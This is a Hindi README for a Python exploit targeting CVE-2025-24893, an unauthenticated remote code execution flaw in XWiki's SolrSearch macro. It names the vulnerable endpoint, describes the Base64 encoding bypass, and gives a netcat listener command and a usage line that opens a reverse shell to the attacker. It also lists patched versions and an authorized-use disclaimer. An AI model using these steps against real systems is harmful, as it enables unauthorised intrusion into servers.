
एक्सविकी में रिमोट कोड एक्जीक्यूशन (RCE) एक्सप्लॉइट
एक्सविकी में रिमोट कोड एक्जीक्यूशन (RCE) एक्सप्लॉइट
CVE-2025-24893 के लिए Python3 में एक एक्सप्लॉइट, जो एक्सविकी प्लेटफ़ॉर्म को प्रभावित करने वाली एक महत्वपूर्ण बिना प्रमाणीकरण के रिमोट कोड एक्जीक्यूशन (RCE) भेद्यता है।
यह स्क्रिप्ट SolrSearch मैक्रो घटक के अंदर एक कोड/एक्सप्रेशन इंजेक्शन (CWE-95) दोष का शोषण करती है। यह दोष हमलावरों को अंतर्निहित ऑपरेटिंग सिस्टम पर मनमाना Groovy/Java कोड निष्पादित करने की अनुमति देता है। एक्सप्लॉइट स्वचालित रूप से Base64 एन्कोडिंग करता है ताकि Java के Runtime.getRuntime().exec() फ़ंक्शन की कमांड इंटरप्रिटेशन सीमाओं से बचा जा सके।
/bin/get/Main/SolrSearch (text पैरामीटर के माध्यम से)nc -lvnp 4444
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>
उदाहरण:
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444
requests लाइब्रेरीआवश्यक निर्भरता स्थापित करने के लिए:
pip install requests
अपने XWiki इंस्टेंस को आधिकारिक पैच किए गए संस्करणों में से किसी एक में अपडेट करें: 15.10.11, 16.4.1, 16.5.0-rc-1 (या उच्चतर)।
यह स्क्रिप्ट विशेष रूप से शैक्षिक उद्देश्यों, अधिकृत सुरक्षा ऑडिट और पेनिट्रेशन टेस्टिंग (Pentest) के लिए विकसित की गई है। लेखक इस उपकरण के किसी भी दुरुपयोग, क्षति या अवैध गतिविधियों के लिए जिम्मेदार नहीं है। पूर्व अनुमति के बिना लक्ष्यों के विरुद्ध इस स्क्रिप्ट का उपयोग सख्ती से अवैध है।